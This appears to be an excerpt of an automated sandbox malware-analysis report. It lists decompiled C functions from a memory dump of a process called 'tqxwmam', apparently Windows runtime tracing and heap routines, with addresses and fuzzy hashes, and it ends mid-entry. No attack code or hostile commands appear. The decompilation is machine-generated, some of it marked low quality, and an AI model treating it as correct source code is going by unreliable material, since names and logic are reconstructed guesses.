                                                    0x00b3fede
                                                    0x00b3fee0
                                                    0x00b3feeb
                                                    0x00b3fef3
                                                    0x00b3fef6
                                                    0x00b3fef9
                                                    0x00b3ff04
                                                    0x00b3ff16
                                                    0x00b3ff06
                                                    0x00b3ff0f
                                                    0x00b3ff0f
                                                    0x00b3ff21
                                                    0x00b3ff22
                                                    0x00b3ff24
                                                    0x00b3ff29
                                                    0x00b3ff3e

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0305fa8f6c49343ea8c4d6714d1300252847089b6766d70f672e1e20592e070
                                                    • Instruction ID: 91cde308110438c150bd17d3a7b3874ddc7e384ebff0fb78812f9ce2517adb52
                                                    • Opcode Fuzzy Hash: e0305fa8f6c49343ea8c4d6714d1300252847089b6766d70f672e1e20592e070
                                                    • Instruction Fuzzy Hash: 63018471E01208AFCB14DBA9D946FAFB7B8EF45700F11406AB905AB391EA709A01CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B3FE3F Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00B3FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0xb7d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00ACFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E00AA7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                    0x00b3fe3f
                                                    0x00b3fe3f
                                                    0x00b3fe4e
                                                    0x00b3fe58
                                                    0x00b3fe5d
                                                    0x00b3fe5f
                                                    0x00b3fe6a
                                                    0x00b3fe72
                                                    0x00b3fe75
                                                    0x00b3fe78
                                                    0x00b3fe83
                                                    0x00b3fe95
                                                    0x00b3fe85
                                                    0x00b3fe8e
                                                    0x00b3fe8e
                                                    0x00b3fea0
                                                    0x00b3fea1
                                                    0x00b3fea3
                                                    0x00b3fea8
                                                    0x00b3febd

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61552b4262c6cda3ec0c2a97f603e240e246ada06bdb0e9956700e235b10256d
                                                    • Instruction ID: c9aaf9b526e6e7dd4fa119b1b57187f2845e39f834e41bb2563b63a2839a0c45
                                                    • Opcode Fuzzy Hash: 61552b4262c6cda3ec0c2a97f603e240e246ada06bdb0e9956700e235b10256d
                                                    • Instruction Fuzzy Hash: 35018471E00218AFCB14DFA9D846FAFB7B8EF44700F11406AB904AB291DA749901CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B58ED6 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E00B58ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0xb7d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E00AA7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                    0x00b58ed6
                                                    0x00b58ee5
                                                    0x00b58eed
                                                    0x00b58ef0
                                                    0x00b58efa
                                                    0x00b58f03
                                                    0x00b58f0c
                                                    0x00b58f15
                                                    0x00b58f24
                                                    0x00b58f27
                                                    0x00b58f31
                                                    0x00b58f43
                                                    0x00b58f33
                                                    0x00b58f3c
                                                    0x00b58f3c
                                                    0x00b58f4e
                                                    0x00b58f4f
                                                    0x00b58f51
                                                    0x00b58f56
                                                    0x00b58f69

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c3312379071355280456bf2222397ff3e0a7bf15c533a3027b10d773871b360
                                                    • Instruction ID: cd3257cd1a7ea19696b66272bc8e02e7ed6ebb1dc3836e949a8c2e6676ef7a0e
                                                    • Opcode Fuzzy Hash: 1c3312379071355280456bf2222397ff3e0a7bf15c533a3027b10d773871b360
                                                    • Instruction Fuzzy Hash: 27111E70A002099FDB04DFA9D541BAEB7F4FF08300F1442AAE919EB382EA349940CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B58A62 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E00B58A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0xb7d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E00AA7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                    0x00b58a62
                                                    0x00b58a71
                                                    0x00b58a79
                                                    0x00b58a82
                                                    0x00b58a85
                                                    0x00b58a89
                                                    0x00b58a8c
                                                    0x00b58a8f
                                                    0x00b58a92
                                                    0x00b58a95
                                                    0x00b58a9f
                                                    0x00b58ab1
                                                    0x00b58aa1
                                                    0x00b58aaa
                                                    0x00b58aaa
                                                    0x00b58abc
                                                    0x00b58abd
                                                    0x00b58abf
                                                    0x00b58ac4
                                                    0x00b58ada

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 902eb9bb761b0a09aecb63b72e9aa177da40cd904bd00cd177661246605d8b91
                                                    • Instruction ID: 782d0f6a12a32590ff26da7848f46dc2ab7906cbb38b5435369199457781250f
                                                    • Opcode Fuzzy Hash: 902eb9bb761b0a09aecb63b72e9aa177da40cd904bd00cd177661246605d8b91
                                                    • Instruction Fuzzy Hash: 64011E71A002189FCB00DFA9D941AAEB7B8EF48351F10409AF905F7351DA34A9018BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8DB60 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00A8DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E00A8DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E00A8E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L00A8E8B0(__ecx, _t14, 0xfff);
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                    0x00a8db64
                                                    0x00a8db66
                                                    0x00a8db6b
                                                    0x00a8dbaa
                                                    0x00a8db71
                                                    0x00a8db76
                                                    0x00a8db7a
                                                    0x00a8dba3
                                                    0x00a8db7c
                                                    0x00a8db87
                                                    0x00a8db8b
                                                    0x00ae4fa1
                                                    0x00ae4fb3
                                                    0x00ae4fb8
                                                    0x00a8db91
                                                    0x00a8db96
                                                    0x00a8db98
                                                    0x00a8db98
                                                    0x00a8db8b
                                                    0x00a8db7a
                                                    0x00a8db9d
                                                    0x00a8dba2

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                    • Instruction ID: b6495f1f106ab168c44e787bab2be60fa4ab8c7f5661564da2eeb625ce83823a
                                                    • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                    • Instruction Fuzzy Hash: 36F09C332456629BD7327B558989F6BB7A59FC6B60F270035F1059B3C4CA608C0297D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8B1E1 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00A8B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E00AA7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E00AA7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E00B07016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                    0x00a8b1e8
                                                    0x00a8b1ea
                                                    0x00a8b1f3
                                                    0x00ae4a17
                                                    0x00a8b1f9
                                                    0x00a8b1f9
                                                    0x00a8b1f9
                                                    0x00a8b201
                                                    0x00ae4a21
                                                    0x00ae4a2e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae4a3b
                                                    0x00ae4a4d
                                                    0x00ae4a3d
                                                    0x00ae4a46
                                                    0x00ae4a46
                                                    0x00ae4a55
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a8b20a
                                                    0x00a8b20a
                                                    0x00a8b20a
                                                    0x00a8b20a

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                    • Instruction ID: 6669f393fa63dd5b341d920d3e9f66be09a137db49c9f9c86c5677b9ee3f48df
                                                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                    • Instruction Fuzzy Hash: 1901D6326545809BD322A75EC904F5A7F99EF557A0F0900B1F9148B6B2E779DC00C724
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B1FE87 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E00B1FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0xb7d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E00AA7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                    0x00b1fe96
                                                    0x00b1fe9e
                                                    0x00b1fea1
                                                    0x00b1fead
                                                    0x00b1feb3
                                                    0x00b1feb9
                                                    0x00b1fec3
                                                    0x00b1fed5
                                                    0x00b1fec5
                                                    0x00b1fece
                                                    0x00b1fece
                                                    0x00b1fee0
                                                    0x00b1fee1
                                                    0x00b1fee3
                                                    0x00b1fee8
                                                    0x00b1fefb

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 756c79d52a413dbb11c6f6997a920138294e347750a766c1a136312d3e9e69eb
                                                    • Instruction ID: bf60dac7c2203b527f7acc5ad6e2ae0f861221a05a26054d7c4486b3ebd64731
                                                    • Opcode Fuzzy Hash: 756c79d52a413dbb11c6f6997a920138294e347750a766c1a136312d3e9e69eb
                                                    • Instruction Fuzzy Hash: 93018671A0020DEFCB14DFA8D546AAEB7F4FF04300F5041A9B519EB392DA35D901CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B4131B Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E00B4131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0xb7d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E00AA7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                    0x00b4131b
                                                    0x00b4132a
                                                    0x00b41330
                                                    0x00b41336
                                                    0x00b4133e
                                                    0x00b41341
                                                    0x00b41344
                                                    0x00b4134f
                                                    0x00b41361
                                                    0x00b41351
                                                    0x00b4135a
                                                    0x00b4135a
                                                    0x00b4136c
                                                    0x00b4136d
                                                    0x00b4136f
                                                    0x00b41374
                                                    0x00b41387

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 709557ad3d320074ee1ce5b645a9f873d1ca5327bf43259bd42b4e89069ff360
                                                    • Instruction ID: 3dd1d2ee4f43de9cdd17363f584c45f52c6a86cb807a15ba3ffcaa71a6adf58b
                                                    • Opcode Fuzzy Hash: 709557ad3d320074ee1ce5b645a9f873d1ca5327bf43259bd42b4e89069ff360
                                                    • Instruction Fuzzy Hash: 02013C71E01208AFCB04EFA9DA46AAEB7F4FF08700F104099B845EB391EA349A40DB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B58F6A Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E00B58F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0xb7d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E00AA7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                    0x00b58f6a
                                                    0x00b58f79
                                                    0x00b58f81
                                                    0x00b58f84
                                                    0x00b58f8b
                                                    0x00b58f91
                                                    0x00b58f94
                                                    0x00b58f9e
                                                    0x00b58fb0
                                                    0x00b58fa0
                                                    0x00b58fa9
                                                    0x00b58fa9
                                                    0x00b58fbb
                                                    0x00b58fbc
                                                    0x00b58fbe
                                                    0x00b58fc3
                                                    0x00b58fd6

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc2207acb899ca03da16139374bfc407a052a96e87a2b0de191e3b9738c223eb
                                                    • Instruction ID: 84c02505c7f10a676fdba7bf06b6b0545a2a1c11db27fe9f726f43ee526a35b1
                                                    • Opcode Fuzzy Hash: fc2207acb899ca03da16139374bfc407a052a96e87a2b0de191e3b9738c223eb
                                                    • Instruction Fuzzy Hash: FB013174A00208AFCB00DFA8D546BAEB7F4EF18300F104499B905EB391EA34DA00CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B41608 Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E00B41608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0xb7d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E00AA7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                    0x00b41608
                                                    0x00b41617
                                                    0x00b4161d
                                                    0x00b41625
                                                    0x00b41628
                                                    0x00b4162b
                                                    0x00b41636
                                                    0x00b41648
                                                    0x00b41638
                                                    0x00b41641
                                                    0x00b41641
                                                    0x00b41653
                                                    0x00b41654
                                                    0x00b41656
                                                    0x00b4165b
                                                    0x00b4166e

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a165768584887959ae355b26e8c32eb1fbefed80ea2fbfa749dcb4347727c9e
                                                    • Instruction ID: 9b00a03a67dbc64f26cc05410f8ae263653f466939be359483d21a8a62f07ee5
                                                    • Opcode Fuzzy Hash: 8a165768584887959ae355b26e8c32eb1fbefed80ea2fbfa749dcb4347727c9e
                                                    • Instruction Fuzzy Hash: 76F04F71E04258EFCB04DFA9D946EAEB7F4EF04300F054099B915EB291EA34DA00CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AAC577 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AAC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E00AAC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xa611cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E00B588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                    0x00aac577
                                                    0x00aac57d
                                                    0x00aac581
                                                    0x00aac5b5
                                                    0x00aac5b9
                                                    0x00aac5ce
                                                    0x00aac5ce
                                                    0x00aac5ca
                                                    0x00000000
                                                    0x00aac5ca
                                                    0x00aac5c4
                                                    0x00aac5c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aac5ad
                                                    0x00000000
                                                    0x00aac5af

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d9c50cc369247d99f53dc70f98b33b7e2364e785b81f77244447932d297b73e
                                                    • Instruction ID: 54839024ac8063cc2b46b734e179c41811e7fc6952b25832edb9ece7433a972a
                                                    • Opcode Fuzzy Hash: 2d9c50cc369247d99f53dc70f98b33b7e2364e785b81f77244447932d297b73e
                                                    • Instruction Fuzzy Hash: 90F090B2D956929FFB32C7148044B217BE49B07770F5484A7F41587182D7A4FC80C250
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B42073 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00B42073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E00B3FD22(__ecx);
				_t19 =  *0xb7849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0xb78748; // 0x0
					if(__eflags <= 0) {
						E00B41C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0xb78724 & 0x00000004;
							if(( *0xb78724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0xb78724; // 0x0
					return E00B38DF1(__ebx, 0xc0000374, 0xb75890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                    0x00b42076
                                                    0x00b42078
                                                    0x00b4207d
                                                    0x00b42083
                                                    0x00b420a4
                                                    0x00b420aa
                                                    0x00b420ac
                                                    0x00b420b7
                                                    0x00b420ba
                                                    0x00b420bc
                                                    0x00b420c9
                                                    0x00b420c9
                                                    0x00b420d0
                                                    0x00b420d2
                                                    0x00000000
                                                    0x00b420d2
                                                    0x00b420be
                                                    0x00b420c3
                                                    0x00b420c5
                                                    0x00b420c7
                                                    0x00000000
                                                    0x00000000
                                                    0x00b420c7
                                                    0x00b420bc
                                                    0x00b420d4
                                                    0x00b42085
                                                    0x00b42085
                                                    0x00b420a3
                                                    0x00b420a3

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb581954c6fff585cb92b6485d450f472ca0ffe3a8af040baaa39b6f501342c1
                                                    • Instruction ID: c9b19420e8f5a490f88c03587a22808d41986ffdefb26cc15fd55bbb9dcfb3e1
                                                    • Opcode Fuzzy Hash: fb581954c6fff585cb92b6485d450f472ca0ffe3a8af040baaa39b6f501342c1
                                                    • Instruction Fuzzy Hash: 4DF0202A8211844ADF3A6B28280A2E17BD0C755310FA904D6F8A85B302CD388EC3FB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B58D34 Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 43%
                                                    			E00B58D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0xb7d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E00AA7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                    0x00b58d34
                                                    0x00b58d43
                                                    0x00b58d4b
                                                    0x00b58d4e
                                                    0x00b58d52
                                                    0x00b58d5c
                                                    0x00b58d6e
                                                    0x00b58d5e
                                                    0x00b58d67
                                                    0x00b58d67
                                                    0x00b58d79
                                                    0x00b58d7a
                                                    0x00b58d7c
                                                    0x00b58d81
                                                    0x00b58d94

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41efdb4e10eef6c1169c77534f0c195d00b159a52263005a892bab24e7a0876a
